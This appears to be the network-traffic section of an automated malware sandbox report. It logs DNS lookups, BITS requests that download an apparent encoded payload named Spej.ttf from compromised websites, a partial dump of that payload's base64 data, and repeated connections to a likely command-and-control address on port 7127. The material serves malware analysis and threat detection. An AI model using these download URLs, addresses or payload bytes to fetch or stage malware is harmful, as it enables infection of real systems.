                                                                                    Dec 19, 2024 12:47:59.237164974 CET49708443192.168.2.5107.161.23.150
                                                                                    Dec 19, 2024 12:47:59.237363100 CET44349708107.161.23.150192.168.2.5
                                                                                    Dec 19, 2024 12:47:59.237396002 CET44349708107.161.23.150192.168.2.5
                                                                                    Dec 19, 2024 12:47:59.237435102 CET49708443192.168.2.5107.161.23.150
                                                                                    Dec 19, 2024 12:48:29.534090996 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:29.534137964 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:29.534434080 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:29.551481962 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:29.551506996 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:31.420170069 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:31.420406103 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:31.477849960 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:31.477926016 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:31.478276014 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:31.478344917 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:31.481208086 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:31.523363113 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.209058046 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.209083080 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.209172964 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.209189892 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.209605932 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.432929039 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.432945013 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.433108091 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.454190016 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.454327106 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.486354113 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.486502886 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.509579897 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.509808064 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.669749022 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.669998884 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.689590931 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.689773083 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.711858988 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.711941957 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.729074001 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.729170084 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.746301889 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.746387005 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.764956951 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.765041113 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.786767960 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.786937952 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.902235985 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.902379990 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.914997101 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.915122032 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.924451113 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.924546957 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.933245897 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.933340073 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.939522982 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.939620018 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:32.945239067 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:32.945321083 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.190680981 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.190697908 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.190812111 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.197366953 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.197480917 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.202838898 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.202950001 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.208733082 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.208820105 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.214585066 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.214665890 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.222394943 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.222465992 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.228744984 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.228831053 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.235054970 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.235202074 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.240369081 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.240472078 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.248251915 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.248342991 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.256851912 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.256932974 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.262366056 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.262471914 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.267553091 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.267662048 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.273869991 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.273966074 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.281198025 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.281358957 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.286727905 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.286844015 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.292895079 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.292990923 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.384919882 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.384999990 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.390558004 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.390630007 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.397530079 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.397599936 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.401408911 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.401474953 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.406347036 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.406420946 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.410995007 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.411055088 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.416759968 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.416830063 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.422564983 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.422622919 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.426615000 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.426681995 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.431308985 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.431379080 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.435575008 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.435656071 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.440190077 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.440253019 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.445261002 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.445331097 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.449577093 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.449647903 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.455538034 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.455611944 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.687594891 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.687634945 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.687750101 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.690840006 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.690922976 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.694627047 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.694701910 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.699050903 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.699147940 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.702229023 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.702312946 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.705889940 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.705976009 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.709218979 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.709300995 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.713623047 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.713709116 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.717046976 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.717128038 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.721185923 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.721296072 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.724551916 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.724651098 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.728003025 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.728090048 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.732289076 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.732428074 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.735924959 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.735996008 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.739429951 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.739526987 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.743432045 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.743536949 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.879184961 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.879333019 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.884284019 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.884440899 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.887439966 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.887523890 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.891236067 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.891374111 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.897192955 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.897310019 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.900904894 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.901026011 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.904838085 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.904973984 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.905564070 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.905631065 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.905647993 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.905693054 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.905716896 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.905725002 CET44349771103.120.177.150192.168.2.5
                                                                                    Dec 19, 2024 12:48:33.905765057 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:33.905796051 CET49771443192.168.2.5103.120.177.150
                                                                                    Dec 19, 2024 12:48:47.884397984 CET498157127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:48.004235983 CET71274981591.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:48:48.004328012 CET498157127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:48.004694939 CET498157127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:48.125318050 CET71274981591.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:48:52.885657072 CET498157127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:53.046833992 CET71274981591.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:48:57.893861055 CET498367127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:58.013631105 CET71274983691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:48:58.015661955 CET498367127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:58.018376112 CET498367127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:48:58.138492107 CET71274983691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:02.913198948 CET498367127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:03.078286886 CET71274983691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:07.925242901 CET498627127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:08.044918060 CET71274986291.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:08.045099974 CET498627127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:08.045265913 CET498627127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:08.164798021 CET71274986291.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:09.916517973 CET71274981591.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:09.916673899 CET498157127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:12.945130110 CET498627127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:13.106231928 CET71274986291.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:17.941006899 CET498877127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:18.060561895 CET71274988791.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:18.060688019 CET498877127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:18.060888052 CET498877127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:18.180349112 CET71274988791.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:19.932121992 CET71274983691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:19.932348967 CET498367127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:22.961148024 CET498877127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:23.122222900 CET71274988791.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:27.956891060 CET499097127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:28.076590061 CET71274990991.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:28.078478098 CET499097127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:28.078690052 CET499097127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:28.198213100 CET71274990991.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:29.932241917 CET71274986291.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:29.932387114 CET498627127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:32.961570024 CET499097127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:33.122215986 CET71274990991.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:37.956513882 CET499337127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:38.076035976 CET71274993391.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:38.076222897 CET499337127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:38.076687098 CET499337127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:38.196202993 CET71274993391.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:39.963742971 CET71274988791.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:39.963881016 CET498877127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:42.960900068 CET499337127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:43.122589111 CET71274993391.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:47.972191095 CET499567127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:48.091686964 CET71274995691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:48.091778994 CET499567127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:48.091948986 CET499567127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:48.211553097 CET71274995691.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:49.995254993 CET71274990991.92.252.226192.168.2.5
                                                                                    Dec 19, 2024 12:49:49.995445967 CET499097127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:52.992013931 CET499567127192.168.2.591.92.252.226
                                                                                    Dec 19, 2024 12:49:53.154303074 CET71274995691.92.252.226192.168.2.5

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 19, 2024 12:47:54.667534113 CET6541653192.168.2.51.1.1.1
                                                                                    Dec 19, 2024 12:47:54.805587053 CET53654161.1.1.1192.168.2.5
                                                                                    Dec 19, 2024 12:48:28.487698078 CET5506053192.168.2.51.1.1.1
                                                                                    Dec 19, 2024 12:48:29.487653971 CET5506053192.168.2.51.1.1.1
                                                                                    Dec 19, 2024 12:48:29.528006077 CET53550601.1.1.1192.168.2.5
                                                                                    Dec 19, 2024 12:48:29.626509905 CET53550601.1.1.1192.168.2.5

                                                                                    DNS Queries

                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 12:47:54.667534113 CET192.168.2.51.1.1.10xe89eStandard query (0)www.astenterprises.com.pkA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:28.487698078 CET192.168.2.51.1.1.10x6407Standard query (0)www.royalengineeringllc.comA (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:29.487653971 CET192.168.2.51.1.1.10x6407Standard query (0)www.royalengineeringllc.comA (IP address)IN (0x0001)false

                                                                                    DNS Answers

                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Dec 19, 2024 12:47:54.805587053 CET1.1.1.1192.168.2.50xe89eNo error (0)www.astenterprises.com.pkastenterprises.com.pkCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 12:47:54.805587053 CET1.1.1.1192.168.2.50xe89eNo error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:29.528006077 CET1.1.1.1192.168.2.50x6407No error (0)www.royalengineeringllc.comroyalengineeringllc.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:29.528006077 CET1.1.1.1192.168.2.50x6407No error (0)royalengineeringllc.com103.120.177.150A (IP address)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:29.626509905 CET1.1.1.1192.168.2.50x6407No error (0)www.royalengineeringllc.comroyalengineeringllc.comCNAME (Canonical name)IN (0x0001)false
                                                                                    Dec 19, 2024 12:48:29.626509905 CET1.1.1.1192.168.2.50x6407No error (0)royalengineeringllc.com103.120.177.150A (IP address)IN (0x0001)false

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.astenterprises.com.pk
                                                                                    • www.royalengineeringllc.com

                                                                                    HTTPS Proxied Packets

                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.549707107.161.23.1504433712C:\Windows\System32\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-19 11:47:56 UTC159OUTHEAD /ms/Spej.ttf HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    Accept-Encoding: identity
                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                    Host: www.astenterprises.com.pk
                                                                                    2024-12-19 11:47:56 UTC467INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    cache-control: public, max-age=604800
                                                                                    expires: Thu, 26 Dec 2024 11:47:56 GMT
                                                                                    content-type: font/ttf
                                                                                    last-modified: Mon, 05 Feb 2024 11:01:15 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 394652
                                                                                    date: Thu, 19 Dec 2024 11:47:56 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.549708107.161.23.1504433712C:\Windows\System32\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-12-19 11:47:57 UTC210OUTGET /ms/Spej.ttf HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Accept: */*
                                                                                    Accept-Encoding: identity
                                                                                    If-Unmodified-Since: Mon, 05 Feb 2024 11:01:15 GMT
                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                    Host: www.astenterprises.com.pk
                                                                                    2024-12-19 11:47:58 UTC467INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    cache-control: public, max-age=604800
                                                                                    expires: Thu, 26 Dec 2024 11:47:58 GMT
                                                                                    content-type: font/ttf
                                                                                    last-modified: Mon, 05 Feb 2024 11:01:15 GMT
                                                                                    accept-ranges: bytes
                                                                                    content-length: 394652
                                                                                    date: Thu, 19 Dec 2024 11:47:58 GMT
                                                                                    server: LiteSpeed
                                                                                    alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 36 77 4b 34 32 4f 73 43 50 7a 2b 37 7a 44 34 63 41 4f 73 43 4c 56 31 78 41 5a 73 44 58 43 51 45 36 77 4c 6d 52 2b 73 43 32 36 57 35 4c 4d 7a 52 6b 6e 45 42 6d 2b 73 43 49 4b 4b 42 38 5a 50 56 66 52 5a 78 41 5a 74 78 41 5a 75 42 36 62 38 5a 72 49 54 72 41 68 44 54 63 51 47 62 63 51 47 62 36 77 4c 35 43 37 70 41 6e 4f 35 6a 63 51 47 62 63 51 47 62 36 77 4c 49 4d 75 73 43 77 4f 51 78 79 6e 45 42 6d 33 45 42 6d 34 6b 55 43 33 45 42 6d 2b 73 43 75 56 4c 52 34 6e 45 42 6d 33 45 42 6d 34 50 42 42 4f 73 43 43 58 35 78 41 5a 75 42 2b 66 53 54 54 41 52 38 7a 4f 73 43 48 65 37 72 41 6a 76 52 69 30 51 6b 42 4f 73 43 59 58 2f 72 41 69 37 6f 69 63 4e 78 41 5a 74 78 41 5a 75 42 77 2b 76 52 69 51 46 78 41 5a 76 72 41 6a 4f 7a 75 6d 49 69 54 4e 37 72 41 6d 2f 4c 63 51 47
                                                                                    Data Ascii: 6wK42OsCPz+7zD4cAOsCLV1xAZsDXCQE6wLmR+sC26W5LMzRknEBm+sCIKKB8ZPVfRZxAZtxAZuB6b8ZrITrAhDTcQGbcQGb6wL5C7pAnO5jcQGbcQGb6wLIMusCwOQxynEBm3EBm4kUC3EBm+sCuVLR4nEBm3EBm4PBBOsCCX5xAZuB+fSTTAR8zOsCHe7rAjvRi0QkBOsCYX/rAi7oicNxAZtxAZuBw+vRiQFxAZvrAjOzumIiTN7rAm/LcQG
                                                                                    2024-12-19 11:47:58 UTC16384INData Raw: 2f 35 4a 79 6f 68 5a 55 62 4b 5a 55 69 78 72 6b 75 36 51 48 6c 33 74 43 4d 74 55 2b 5a 77 5a 42 78 75 36 62 7a 4d 62 32 35 38 50 48 37 70 76 44 78 2b 36 62 77 2b 2b 4e 41 52 78 6a 56 4c 4c 38 32 62 71 4d 39 35 36 52 36 59 6a 48 4f 4e 44 66 72 71 34 36 70 74 33 39 53 49 43 2f 65 39 32 4c 4e 41 5a 45 71 67 4a 56 48 36 41 54 69 68 6f 77 73 42 4e 38 54 4a 64 57 74 7a 61 30 33 4a 34 6e 45 57 52 45 39 70 69 33 64 6e 6a 71 6f 51 2f 51 62 62 6b 48 53 69 44 76 6e 46 35 43 4d 65 62 52 62 36 2b 4f 39 49 58 42 47 56 4c 41 44 53 76 2b 59 59 39 67 47 45 2f 73 47 37 5a 78 79 6b 63 67 39 36 4d 4d 76 36 70 63 70 65 52 2f 79 47 43 67 41 6d 70 6e 6e 47 34 33 54 62 69 32 74 68 6f 77 35 33 4c 64 6e 6b 59 46 57 63 47 79 57 4d 74 37 77 6e 72 70 48 76 49 65 45 78 4d 35 32 77 66
